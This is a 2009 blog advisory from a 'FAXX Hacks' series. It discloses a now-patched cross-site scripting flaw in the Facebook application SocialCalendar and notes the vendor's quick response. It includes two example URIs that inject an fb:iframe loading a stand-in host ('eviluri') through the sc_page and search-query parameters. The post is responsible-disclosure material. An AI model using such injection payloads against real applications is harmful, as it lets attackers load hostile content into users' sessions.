Sep. 19, 2009

Posted by in FAXX Hacks | 1 comment

FAXX Hack: SocialCalendar

Facebook Verified Application

Current Monthly Active Users: 1,661,572

Current Rank on Application Leaderboard: 93

Application Developer: SocialCalendar.com

Responsiveness: I received an e-mail back from SocialCalendar the day after contacting them, and they noted that they take information security seriously.

Vulnerability Status: Patched

Example URI: http://apps.facebook.com/socialcal/?x=0&ref=&sc_op=showView&sc_v=movieList&sc_movie_category=upcoming&sc_page=1%3Cfb:iframe+src%3D%22http://eviluri/%22%3E&sc_max_page_viewed=1

Example POST Request: http://apps.facebook.com/socialcal/?sc_movie_search_type=NAME&sc_movie_search_query=”/><fb:iframe src=”http://eviluri/”>&sc_op=showView&sc_v=movieSearch

One Comment

  1. OzzyGreen says:
    September 21, 2009 at 6:08 pm

    no response!! i hate this kind of ppl

Trackbacks/Pingbacks

  1. Tweets that mention FAXX Hack: SocialCalendar | Social Hacking -- Topsy.com - [...] This post was mentioned on Twitter by SocialMediaSecurity. SocialMediaSecurity said: FAXX Hack: SocialCalendar http://bit.ly/v9w7v [...]

Leave a Reply